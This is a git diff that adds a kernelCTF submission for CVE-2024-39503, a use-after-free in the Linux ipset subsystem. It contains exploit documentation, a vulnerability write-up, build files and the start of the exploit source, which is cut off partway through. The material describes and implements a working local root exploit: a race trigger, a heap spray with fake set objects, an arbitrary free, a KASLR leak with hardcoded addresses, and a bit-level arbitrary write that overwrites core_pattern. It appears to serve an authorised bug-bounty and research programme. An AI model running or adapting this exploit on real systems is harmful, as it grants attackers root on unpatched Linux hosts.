diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/exploit.md
new file mode 100644
index 00000000..94761feb
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/exploit.md
@@ -0,0 +1,311 @@
+# CVE-2024-39503
+
+Exploit documentation for CVE-2024-39503 against the lts-6.6.30 / cos-109-17800.218.20 instances.
+
+## Stage 1: Triggering the vulnerability
+
+As described in the vulnerability documentation, we are targeting a race condition in the ip set
+subsystem. A successful trigger would result in a use-after-free on a `struct ip_set` in
+`kmalloc-192`.
+```c
+/* A generic IP set */
+struct ip_set {
+    /* For call_cru in destroy */
+    struct rcu_head rcu;
+    /* The name of the set */
+    char name[IPSET_MAXNAMELEN];
+    /* Lock protecting the set data */
+    spinlock_t lock;
+    /* References to the set */
+    u32 ref;
+    /* References to the set for netlink events like dump,
+     * ref can be swapped out by ip_set_swap
+     */
+    u32 ref_netlink;
+    /* The core set type */
+    struct ip_set_type *type;
+    /* The type variant doing the real job */
+    const struct ip_set_type_variant *variant;
+    /* The actual INET family of the set */
+    u8 family;
+    /* The type revision */
+    u8 revision;
+    /* Extensions */
+    u8 extensions; // [0.1]
+    /* Create flags */
+    u8 flags;
+    /* Default timeout value, if enabled */
+    u32 timeout;
+    /* Number of elements (vs timeout) */
+    u32 elements;
+    /* Size of the dynamic extensions (vs timeout) */
+    size_t ext_size;
+    /* Element data size */
+    size_t dsize;
+    /* Offsets to extensions in elements */
+    size_t offset[IPSET_EXT_ID_MAX]; // [0.2]
+    /* The type specific data */
+    void *data; // [0.3]
+};
+```
+
+A successful trigger could result from a scenario which looks like this:
+```
+      CPU 0                          CPU 1
+// cleanup_net()
+synchronize_rcu();                   ...
+
+                                     GC runs, list_set_del   [1.1]
+
+ip_set_net_exit          [1.2]
+< GC is cleaned up >
+ip_set_destroy_set       [1.3]
+< set is free now >                  ...
+
+[ spray window ]
+
+                                     < rcu clean up runs >
+                                     __list_set_del_rcu      [1.4]
+                                     ==> use-after-free
+```
+
+The general setup is separated into three processes:
+- main: the root process, which spawns the spray process and retries on failure
+- spray: spawns the bug trigger process and performs the heap spray
+- bug: sets up the bug trigger in its own namespace, which is torn down when the process exits,
+  and thus performs one try at hitting the race.
+
+Because our bug requires interaction with multiple namespaces, such a "complex" process
+structure is sadly required.
+
+Let's look at each process in more detail.
+The main process is not really important for now; its main purpose is to provide a
+retry loop.
+
+The spray process is arguably the most important one.
+It runs once for each try at hitting the race.
+In the initial stage it does the following things in order:
+1. Prepare the bug trigger process in a new user namespace
+2. Prepare spraying primitives and other post-trigger setup
+3. Signal the bug trigger process to perform one try
+4. Wait for the bug trigger process to exit
+5. Perform the heap spray and check for success.
+
+By timing the delay between steps 4 and 5 well, the heap spray
+runs concurrently with the namespace cleanup triggered by the bug process.
+Special care is taken when assigning CPU cores to ensure that the spray
+runs on the same core as the trigger. Additionally, the cleanup has to run on
+another core so that the two can run truly concurrently.
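+
+A condensed sketch of this orchestration (distilled from `exploit.c` in this submission;
+error handling and the spray itself are omitted, and `try_trigger_bug()` /
+`trigger_stack_top` are placeholders for the real worker and its stack):
+
+```c
+#define _GNU_SOURCE
+#include <sched.h>
+#include <stdint.h>
+#include <time.h>
+#include <sys/timerfd.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#define MAIN_CPU 0                      /* core shared by trigger and spray */
+
+static int pin_to_cpu(int id) {
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(id, &set);
+    return sched_setaffinity(0, sizeof(set), &set);
+}
+
+/* placeholder: arms the GC race inside its own user+net namespace */
+extern int try_trigger_bug(void *arg);
+extern char trigger_stack_top[];
+
+static int run_one_attempt(void) {
+    /* 1. start the bug process in fresh namespaces (it shares our VM) */
+    int pid = clone(try_trigger_bug, trigger_stack_top,
+                    CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM | SIGCHLD, NULL);
+    if (pid < 0)
+        return -1;
+
+    /* 2./3. prepare the spray primitives here, then signal the child */
+
+    pin_to_cpu(MAIN_CPU);               /* spray from the allocation CPU */
+
+    /* 4. child exit means the namespace teardown has been queued */
+    waitpid(pid, NULL, 0);
+
+    /* short grace period (~50 jiffies) so cleanup_net() is in flight */
+    int tfd = timerfd_create(CLOCK_MONOTONIC, 0);
+    struct itimerspec it = { .it_value = { .tv_nsec = 50 * 1000000L } };
+    timerfd_settime(tfd, 0, &it, NULL);
+    uint64_t expirations;
+    read(tfd, &expirations, sizeof(expirations));
+    close(tfd);
+
+    /* 5. the heap spray happens here (see "Stage 1 Payload Considerations") */
+    return 0;
+}
+```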
+
+If the bug was triggered successfully _and_ the spray reclaimed one of
+the freed sets in time, the `__list_set_del_rcu` cleanup path in [1.4] will
+use our sprayed payload and we proceed to the next stage.
+
+The bug process tries to prepare good conditions for a positive race outcome.
+Specifically, it does the following:
+Prepare 10 list sets (the type which introduces the vulnerability), each with a garbage
+collector that runs after a 1 second timeout (+/- some jiffies).
+To each of those sets we add the same single element with a short timeout.
+(We use a `bitmap:port` set as the element, for no particular reason.)
+We do not send this payload straight away; rather, we pack everything into one large netlink
+message which is sent all at once to gain better control over the timing.
+At this point we wait for the signal to trigger the bug.
+
+Once the signal arrives, we set up a timer in our process which fires after a timeout
+close to 1 second, to match the garbage collector.
+With the timer armed, we send the full netlink payload, actually creating all the
+sets and their elements.
+We then wait for the timer to expire and exit the process when it does.
+
+This way, we force the namespace cleanup to run at approximately the same time
+as the garbage collector.
+The large number of sets increases the likelihood of hitting the race for at least one of
+them.
+
+### Stage 1 Payload Considerations
+
+Stage 1 is basically a one-shot scenario: we only have a brief time window in which
+we can reclaim the freed object with a payload in `kmalloc-192`.
+Therefore some special considerations are required for the payload.
+
+Luckily, the RCU callback proves to be very helpful:
+```c
+static void
+__list_set_del_rcu(struct rcu_head * rcu)
+{
+    struct set_elem *e = container_of(rcu, struct set_elem, rcu);
+    struct ip_set *set = e->set; // [2.1]
+
+    ip_set_ext_destroy(set, e); // [2.2]
+    kfree(e);
+}
+
+#define ext_comment(e, s) \
+((struct ip_set_comment *)(((void *)(e)) + (s)->offset[IPSET_EXT_ID_COMMENT]))
+
+static inline void
+ip_set_ext_destroy(struct ip_set *set, void *data)
+{
+    /* Check that the extension is enabled for the set and
+     * call it's destroy function for its extension part in data.
+     */
+    if (SET_WITH_COMMENT(set)) {
+        struct ip_set_comment *c = ext_comment(data, set); // [2.3]
+
+        ip_set_extensions[IPSET_EXT_ID_COMMENT].destroy(set, c);
+    }
+}
+```
+
+Note that we are spraying a fake set; specifically, our payload corresponds
+to the set pointer fetched at [2.1].
+Following the call chain [2.2] into `ip_set_ext_destroy`, we can craft the fake set
+to claim a comment extension ([0.1]), which results in the "comment" being
+freed. For the `list:set` type, extensions live on the element itself
+(i.e. `struct set_elem`) and are referred to by an offset value ([0.2]) which is
+stored in the owning set (i.e. our payload). Therefore we can set arbitrary
+offsets here and essentially cause an arbitrary free.
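+
+Concretely, the stage 1 payload only needs two fields set on an otherwise don't-care
+buffer. A minimal sketch of the layout, mirroring what `exploit.c` does (the trimmed
+`fake_ip_set` struct below assumes the 6.6 layout of `struct ip_set`, and the constants
+are the values used by the exploit):
+
+```c
+#include <string.h>
+
+#define IPSET_EXT_COMMENT    4   /* flag bit in ip_set->extensions */
+#define IPSET_EXT_ID_COMMENT 3   /* index into ip_set->offset[]    */
+
+struct fake_ip_set {             /* trimmed mirror of struct ip_set (152 bytes) */
+    unsigned char rcu[16];
+    char name[32];
+    unsigned int lock, ref, ref_netlink;
+    void *type, *variant;
+    unsigned char family, revision, extensions, flags;
+    unsigned int timeout, elements;
+    unsigned long ext_size, dsize;
+    unsigned long offset[4];
+    void *data;
+};
+
+static void build_fake_set(struct fake_ip_set *s) {
+    memset(s, '?', sizeof(*s));           /* marker bytes, used later as an oracle */
+    s->extensions = IPSET_EXT_COMMENT;    /* make SET_WITH_COMMENT(set) true       */
+    /* ext_comment(e, s) reads at e + offset[COMMENT]; set_elem->set sits at +32,
+     * so the "comment pointer" fetched at [2.4] is the pointer back to our payload */
+    s->offset[IPSET_EXT_ID_COMMENT] = 32;
+}
+```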
+
+To better understand the primitive, have a closer look at the comment destroy function:
+```c
+struct ip_set_comment_rcu {
+    struct rcu_head rcu;
+    char str[];
+};
+
+struct ip_set_comment {
+    struct ip_set_comment_rcu __rcu *c;
+};
+
+static void
+ip_set_comment_free(struct ip_set *set, void *ptr)
+{
+    struct ip_set_comment *comment = ptr;
+    struct ip_set_comment_rcu *c;
+
+    c = rcu_dereference_protected(comment->c, 1); // [2.4]
+    if (unlikely(!c))
+        return;
+    set->ext_size -= sizeof(*c) + strlen(c->str) + 1; // [2.5]
+    kfree_rcu(c, rcu); // [2.6]
+    rcu_assign_pointer(comment->c, NULL);
+}
+```
+
+It reads the actual comment pointer from the offset we specified ([2.4]) and,
+provided it is not `NULL`, runs a `kfree_rcu` on it ([2.6]).
+This means that by choosing an offset which lands on a location holding a useful
+pointer value, we can free that (possibly arbitrary) object.
+
+The simplest victim object to choose for this is the `*set` itself, as it is
+already present on the `struct set_elem` object at offset 32:
+```c
+/* Member elements */
+struct set_elem {
+    struct rcu_head rcu;
+    struct list_head list;
+    struct ip_set *set; /* Sigh, in order to cleanup reference */
+    ip_set_id_t id;
+} __aligned(__alignof__(u64));
+```
+
+Remember that this set pointer is a pointer to the fake object which we sprayed.
+This means we can convert our racy first-stage use-after-free into a (possibly)
+more stable one.
+
+Considering all of this, the most versatile payload for the stage 1 spray
+seems to be the well-known `struct user_key_payload`:
+
+```c
+struct user_key_payload {
+    struct rcu_head rcu;                     /* RCU destructor */
+    unsigned short datalen;                  /* length of this data */
+    char data[] __aligned(__alignof__(u64)); /* actual data */
+};
+```
+
+(It even has a proper RCU head at the correct offset.)
+To summarize, we spray a `struct user_key_payload` which "looks like" a set with
+a comment extension. This extension points to the `*set` member of `struct set_elem`,
+which in turn points back to the sprayed payload.
+
+Since the set is modified when the comment is actually deleted ([2.5]), we can
+easily detect whether the race was successful by reading back the key.
+If it was, we continue to stage 2 with a reasonably stable
+use-after-free on our key payload.
+
+## Stage 2: Use-After-Free on Key Payload
+
+To leverage the use-after-free, I chose to simply reclaim the freed key object
+with another `struct ip_set` object, specifically a `bitmap:port` set.
+There are several good reasons for this choice:
+- An ip set has many pointers as members. Since we control a key object, we can leak a lot of data.
+  In particular, this lets us bypass KASLR via the `type` member (see the sketch below).
+- It has (indirect) function pointer members, making it a prime candidate for RIP control.
+- *But most importantly*, by slightly corrupting the original set we can construct a very simple arbitrary memory write primitive, which is much more useful than any RIP control primitive in the first place.
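+
+For reference, a minimal sketch of the KASLR computation mentioned in the first bullet
+(the two constants are the no-KASLR lts-6.6.30 addresses taken from `exploit.c`):
+
+```c
+#include <stdint.h>
+#include <stdio.h>
+
+static uint64_t core_pattern     = 0xffffffff83db4420ull; /* symbol address w/o KASLR */
+static uint64_t bitmap_port_type = 0xffffffff83eec040ull; /* symbol address w/o KASLR */
+
+/* leaked_type is ip_set->type as read back through the dangling key */
+static void apply_kaslr_leak(uint64_t leaked_type) {
+    uint64_t slide = leaked_type - bitmap_port_type;
+    core_pattern     += slide;
+    bitmap_port_type += slide;
+    printf("kaslr slide: 0x%llx, core_pattern @ 0x%llx\n",
+           (unsigned long long)slide, (unsigned long long)core_pattern);
+}
+```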
+
+To better understand the arbitrary write primitive, let's have a closer look at
+the bitmap ip set type:
+```c
+/* Type structure */
+struct bitmap_port {
+    unsigned long *members;     /* the set members */
+    u16 first_port;             /* host byte order, included in range */
+    u16 last_port;              /* host byte order, included in range */
+    u32 elements;               /* number of max elements in the set */
+    size_t memsize;             /* members size */
+    struct timer_list gc;       /* garbage collection */
+    struct ip_set *set;         /* attached to this ip_set */
+    unsigned char extensions[]  /* data extensions */
+        __aligned(__alignof__(u64));
+};
+```
+
+A set generally consists of the generic `struct ip_set` structure, which holds the
+type-specific operations and a `data` member ([0.3]).
+For the `bitmap:port` type, this data member points to a `struct bitmap_port`
+structure.
+The elements are, as the name suggests, a simple bitmap in the `members` member.
+Since elements are merely bits (in contrast to `list:set`), extensions are
+stored directly on the type structure (see the `extensions` member).
+When an element is added to the set, the corresponding bit is set and the
+extensions are stored at the given index.
+The index for the (port) bitmap is determined by `(port to insert) - first_port`.
+
+Knowing this, we construct our primitive like so:
+1) Create a `bitmap:port` with a 16-byte extension that we can fully control
+2) Add a single element to the bitmap as the first member. This allows us to fake
+   another `struct bitmap_port` header (specifically the `members`, `first_port`
+   and `last_port` fields) at `offsetof(struct bitmap_port, extensions) == 72`
+3) Using our UaF, read the original `struct ip_set`, leaking the `data` member
+4) Again using our UaF, write back the `struct ip_set`, modifying the `data` member
+   by adding the offset (i.e. `72`)
+
+Now we have a bit-level arbitrary read/write primitive through set element
+add/remove operations (a trimmed sketch of the resulting write loop is shown in the
+appendix at the end of this document).
+(As a side note, an even better choice would be something like `bitmap:ip`,
+since it allows a broader range than the limited `u16` port type.)
+
+Additionally, step 3) contains an implicit oracle for whether we reclaimed the
+key object successfully: the `set->name` member overlaps with the key's `datalen` member.
+By making this "length" larger than the original key's, we can observe the difference
+when reading the key back and deduce a successful spray.
+The same applies to step 4): since the set name is modified on success, we notice a
+failed follow-up spray because the set is not found when we trigger any operation on it.
+
+With the primitive in place we only need a target to overwrite.
+We use `core_pattern`, setting it to `|/proc/%P/exe`.
+A subsequent segmentation fault in our exploit process then invokes our exploit
+again as the core dump handler, which is a straight way out of the jail and to root.
+
+## Reliability
+
+The exploit is relatively stable. By default there is no "comment extension"
+(see stage 1), which means that if our spray did not succeed, the RCU cleanup
+is unlikely to corrupt anything along the way.
+Still, we are targeting a race condition, which has its quirks. Specifically,
+the success chances degrade over time as we thrash the heap more and more.
+In my local experiments the exploit succeeded ~70-80% of the time, though this may vary
+depending on the underlying CPU speed, system noise, etc.
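+
+## Appendix: Write Loop Sketch
+
+To make the Stage 2 primitive concrete, here is a trimmed sketch of the core_pattern
+overwrite loop (adapted from `exploit.c`). `set_bit_in_target()` and
+`clear_bit_in_target()` are placeholders for the ipset ADD/DEL element netlink
+requests the exploit actually sends:
+
+```c
+#include <stddef.h>
+
+/* placeholders: IPSET_CMD_ADD / IPSET_CMD_DEL with port == bit_index */
+extern int set_bit_in_target(unsigned int bit_index);
+extern int clear_bit_in_target(unsigned int bit_index);
+
+static const char target_core_pattern[] = "|/proc/%P/exe %P";
+
+/* The fake bitmap_port's `members` points at core_pattern, so bit N of the
+ * set maps directly to bit N of the buffer we want to write. */
+static int overwrite_core_pattern(void) {
+    for (size_t byte = 0; byte < sizeof(target_core_pattern); byte++) {
+        for (int bit = 0; bit < 8; bit++) {
+            unsigned int idx = byte * 8 + bit;
+            int want = (target_core_pattern[byte] >> bit) & 1;
+            int err = want ? set_bit_in_target(idx) : clear_bit_in_target(idx);
+            if (err)
+                return err;   /* e.g. -ENOENT: the reclaim spray did not stick */
+        }
+    }
+    return 0;
+}
+```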
diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/vulnerability.md
new file mode 100644
index 00000000..f24cc3f9
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/vulnerability.md
@@ -0,0 +1,92 @@
+- Requirements:
+  - Capabilities: CAP_NET_ADMIN
+  - Kernel configuration: CONFIG_NETFILTER=y, CONFIG_IP_SET=y, CONFIG_IP_SET_LIST_SET=y
+  - User namespaces required: Yes
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=97f7cf1cd80eeed3b7c808b7c12463295c751001
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4e7aaa6b82d63e8ddcbfb56b4fd3d014ca586f10
+- Affected Version: v6.8 - v6.10
+- Affected Component: netfilter, ip_set
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39503
+- Cause: Use-After-Free
+
+From the patch commit:
+There is a race condition between namespace cleanup in ipset and the garbage
+collection of the list:set type. The namespace cleanup can destroy the list:set
+type of sets while the gc of the set type is waiting to run in rcu cleanup. The
+latter uses data from the destroyed set which thus leads to use after free.
+
+Consider the following code:
+
+```c
+// net/netfilter/ipset/ip_set_core.c:
+
+static void __net_exit
+ip_set_net_exit(struct net *net)
+{
+    // ...
+    ip_set(inst, i) = NULL;
+    set->variant->cancel_gc(set);    [1]
+    ip_set_destroy_set(set);         [2]
+    // ...
+}
+
+static void
+ip_set_destroy_set(struct ip_set *set)
+{
+    // ...
+    kfree(set);                      [3]
+}
+```
+
+Along with the following list set specific code:
+
+```c
+// net/netfilter/ipset/ip_set_list_set.c
+
+static void
+__list_set_del_rcu(struct rcu_head * rcu)
+{
+    struct set_elem *e = container_of(rcu, struct set_elem, rcu);
+    struct ip_set *set = e->set;
+
+    ip_set_ext_destroy(set, e);      [4]
+    kfree(e);
+}
+
+static void
+list_set_del(struct ip_set *set, struct set_elem *e)
+{
+    struct list_set *map = set->data;
+
+    // ...
+    call_rcu(&e->rcu, __list_set_del_rcu);   [5]
+}
+```
+
+As we can see in [5], the element is about to be destroyed by the RCU cleanup in
+`__list_set_del_rcu`. However, the owning set is still referenced in the cleanup
+path [4]. In combination with the non-RCU free of the set in [2] and [3], this leads
+to a brief time window in which the set may be used by the RCU callback after it has
+been freed.
+
+This race seems impossible to win on its own, because the cleanup paths in [2] run
+synchronously. Additionally, the namespace cleanup runs after an RCU synchronization.
+But there is an additional user of the set: the GC, which runs
+periodically and essentially calls [5].
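+
+For completeness, the GC path that ends up calling [5] looks roughly like this
+(paraphrased from `net/netfilter/ipset/ip_set_list_set.c`; the exact code differs
+slightly between kernel versions):
+
+```c
+static void
+set_cleanup_entries(struct ip_set *set)
+{
+    struct list_set *map = set->data;
+    struct set_elem *e, *n;
+
+    list_for_each_entry_safe(e, n, &map->members, list)
+        if (ip_set_timeout_expired(ext_timeout(e, set)))
+            list_set_del(set, e);            /* -> call_rcu(...)  [5] */
+}
+
+static void
+list_set_gc(struct timer_list *t)
+{
+    struct list_set *map = from_timer(map, t, gc);
+    struct ip_set *set = map->set;
+
+    spin_lock_bh(&set->lock);
+    set_cleanup_entries(set);
+    spin_unlock_bh(&set->lock);
+
+    /* re-arm the periodic GC timer */
+    map->gc.expires = jiffies + IPSET_GC_PERIOD(set->timeout) * HZ;
+    add_timer(&map->gc);
+}
+```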
+ +This leaves room for the following scenario: +``` +CPU 0 CPU 1 +// cleanup_net() +synchronize_rcu(); + + GC runs, list_set_del [5] + +ip_set_net_exit [2] +< GC is cleaned up > +ip_set_destroy_set [3] +< set is free now > + + < rcu clean up runs > + __list_set_del_rcu [4] + boom, use-after-free +``` diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/Makefile b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/Makefile new file mode 100644 index 00000000..5efefeab --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/Makefile @@ -0,0 +1,3 @@ + +exploit: exploit.c netlink.c + clang -O3 -ggdb -static -Wall -lpthread -DCOS_109_17800_218_20=1 -o $@ $^ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit new file mode 100755 index 00000000..51e6490e Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit.c b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit.c new file mode 120000 index 00000000..d6739bd7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit.c @@ -0,0 +1 @@ +../lts-6.6.30/exploit.c \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.c b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.c new file mode 120000 index 00000000..74e5a7c2 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.c @@ -0,0 +1 @@ +../lts-6.6.30/netlink.c \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.h b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.h new file mode 120000 index 00000000..ff0d1948 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.h @@ -0,0 +1 @@ +../lts-6.6.30/netlink.h \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/Makefile b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/Makefile new file mode 100644 index 00000000..06c31f94 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/Makefile @@ -0,0 +1,3 @@ + +exploit: exploit.c netlink.c + clang -O3 -ggdb -static -Wall -lpthread -DLTS_6_6_30=1 -o $@ $^ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit new file mode 100755 index 00000000..a57d0668 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit.c b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit.c new file mode 100644 index 00000000..9a08e9c9 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit.c @@ -0,0 +1,742 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include 
+#include +#include +#include +#include +#include + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; + +#include "netlink.h" + +#define FAIL_IF(x) if ((x)) { \ + perror(#x); \ + return -1; \ +} +#define PANIC_IF(x) if ((x)) { \ + perror(#x); \ + exit(errno); \ +} +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +inline static int _pin_to_cpu(int id) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(id, &set); + return sched_setaffinity(getpid(), sizeof(set), &set); +} + +// +// offsets +// + +// #define LTS_6_6_30 1 +// #define COS_109_17800_218_20 1 + +#if LTS_6_6_30 +u64 core_pattern = 0xffffffff83db4420; +u64 bitmap_port_type = 0xffffffff83eec040; +#elif COS_109_17800_218_20 +u64 core_pattern = 0xffffffff839ba9e0; +u64 bitmap_port_type = 0xffffffff83afb520; +#else +#error "unknown version" +#endif + +#define FOR_ALL_OFFSETS(x) do { \ + x(core_pattern); \ + x(bitmap_port_type) \ + } while(0) + +// +// +// + +static char target_core_pattern[] = "|/proc/%P/exe %P"; + +/* A generic IP set */ +struct ip_set { + /* For call_cru in destroy */ + u8 rcu[16]; + /* The name of the set */ + char name[IPSET_MAXNAMELEN]; + /* Lock protecting the set data */ + u32 lock; + /* References to the set */ + u32 ref; + /* References to the set for netlink events like dump, + * ref can be swapped out by ip_set_swap + */ + u32 ref_netlink; + /* The core set type */ + struct ip_set_type *type; + /* The type variant doing the real job */ + const struct ip_set_type_variant *variant; + /* The actual INET family of the set */ + u8 family; + /* The type revision */ + u8 revision; + /* Extensions */ + u8 extensions; + /* Create flags */ + u8 flags; + /* Default timeout value, if enabled */ + u32 timeout; + /* Number of elements (vs timeout) */ + u32 elements; + /* Size of the dynamic extensions (vs timeout) */ + size_t ext_size; + /* Element data size */ + size_t dsize; + /* Offsets to extensions in elements */ + size_t offset[4]; + /* The type specific data */ + void *data; +}; +_Static_assert(sizeof(struct ip_set) == 152, "ip_set size missmatch"); + +struct bitmap_port { + unsigned long *members; /* the set members */ + u16 first_port; /* host byte order, included in range */ + u16 last_port; /* host byte order, included in range */ + u32 elements; /* number of max elements in the set */ + size_t memsize; /* members size */ + unsigned long gc[5]; /* garbage collection */ + struct ip_set *set; /* attached to this ip_set */ + unsigned char extensions[] /* data extensions */; +}; +_Static_assert(sizeof(struct bitmap_port) == 72, "bitmap_port size missmatch"); + + +union key_payload { + struct ip_set ip_set; + struct { + u8 header[24]; + char data[]; + } key; +}; + +#define MAIN_CPU 0 +#define HELPER_CPU 1 + +#define BUF_SIZE (1024*8) +u8* scratch_buf_try_trigger_bug = NULL; +u8* scratch_buf_spray_fake_set = NULL; + +void* try_trigger_bug_stack = NULL; +void* spray_fake_set_stack = NULL; + +#define SPRAY_ERROR 0 +#define SPRAY_RETRY 1 +#define SPRAY_SUCCESS 2 +volatile int status_spray = SPRAY_ERROR; + +#define __EVENT_SET 0 +#define __EVENT_UNSET 1 + +#define EVENT_DEFINE(name, init) volatile int name = init +#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); } + +#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE) +#define EVENT_SET(name) __atomic_store_n(&name, 
__EVENT_SET, __ATOMIC_RELEASE) + +static void msg_setup(struct nlmsghdr* msg, u16 cmd) { + struct nfgenmsg* data = NLMSG_DATA(msg); + msg->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + msg->nlmsg_type = (NFNL_SUBSYS_IPSET << 8) | cmd; + msg->nlmsg_flags = NLM_F_REQUEST; + msg->nlmsg_seq = 0; + msg->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_IPSET); +} + +static void ip_set_add_list_set(struct nlmsghdr* msg, const char* name, u32 gc_interval_sec, u32 cadt_flags) { + msg_setup(msg, IPSET_CMD_CREATE); + + netlink_attr_put(msg, IPSET_ATTR_SETNAME, name, strlen(name) + 1); + netlink_attr_put(msg, IPSET_ATTR_TYPENAME, "list:set", strlen("list:set") + 1); + const u8 proto = IPSET_PROTOCOL; + netlink_attr_put(msg, IPSET_ATTR_PROTOCOL, &proto, sizeof(proto)); + const u8 revision = 3; + netlink_attr_put(msg, IPSET_ATTR_REVISION, &revision, sizeof(revision)); + const u8 fam = NFPROTO_IPV4; + netlink_attr_put(msg, IPSET_ATTR_FAMILY, &fam, sizeof(fam)); + + struct nlattr* sd = netlink_nest_begin(msg, IPSET_ATTR_DATA); + + if (gc_interval_sec) { + const u32 timeout = htonl(3 * gc_interval_sec); + netlink_attr_append(sd, IPSET_ATTR_TIMEOUT | NLA_F_NET_BYTEORDER, &timeout, sizeof(timeout)); + } + + if (cadt_flags) { + cadt_flags = htonl(cadt_flags); + netlink_attr_append(sd, IPSET_ATTR_CADT_FLAGS | NLA_F_NET_BYTEORDER, &cadt_flags, sizeof(cadt_flags)); + } + + netlink_nest_end(msg, sd); +} + +static void ip_set_add_list_set_elem(struct nlmsghdr* msg, const char* name, const char* elem, u32 timeout_sec) { + msg_setup(msg, IPSET_CMD_ADD); + + netlink_attr_put(msg, IPSET_ATTR_SETNAME, name, strlen(name) + 1); + const u8 proto = IPSET_PROTOCOL; + netlink_attr_put(msg, IPSET_ATTR_PROTOCOL, &proto, sizeof(proto)); + + struct nlattr* sd = netlink_nest_begin(msg, IPSET_ATTR_DATA); + + netlink_attr_append(sd, IPSET_ATTR_NAME, elem, strlen(elem) + 1); + + const u32 timeout = htonl(timeout_sec); + netlink_attr_append(sd, IPSET_ATTR_TIMEOUT | NLA_F_NET_BYTEORDER, &timeout, sizeof(timeout)); + + netlink_nest_end(msg, sd); +} + +static void ip_set_add_bitmap_port(struct nlmsghdr* msg, const char* name, u16 from, u16 to, u32 cadt_flags) { + msg_setup(msg, IPSET_CMD_CREATE); + + netlink_attr_put(msg, IPSET_ATTR_SETNAME, name, strlen(name) + 1); + netlink_attr_put(msg, IPSET_ATTR_TYPENAME, "bitmap:port", strlen("bitmap:port") + 1); + const u8 proto = IPSET_PROTOCOL; + netlink_attr_put(msg, IPSET_ATTR_PROTOCOL, &proto, sizeof(proto)); + const u8 revision = 3; + netlink_attr_put(msg, IPSET_ATTR_REVISION, &revision, sizeof(revision)); + const u8 fam = NFPROTO_IPV4; + netlink_attr_put(msg, IPSET_ATTR_FAMILY, &fam, sizeof(fam)); + + struct nlattr* sd = netlink_nest_begin(msg, IPSET_ATTR_DATA); + + from = htons(from); + netlink_attr_append(sd, IPSET_ATTR_PORT | NLA_F_NET_BYTEORDER, &from, sizeof(from)); + to = htons(to); + netlink_attr_append(sd, IPSET_ATTR_PORT_TO | NLA_F_NET_BYTEORDER, &to, sizeof(to)); + + cadt_flags = htonl(cadt_flags); + netlink_attr_append(sd, IPSET_ATTR_CADT_FLAGS | NLA_F_NET_BYTEORDER, &cadt_flags, sizeof(cadt_flags)); + + netlink_nest_end(msg, sd); +} + +static void ip_set_add_bitmap_port_elem(struct nlmsghdr* msg, const char* name, u16 port, u64 counter0, u64 counter1) { + 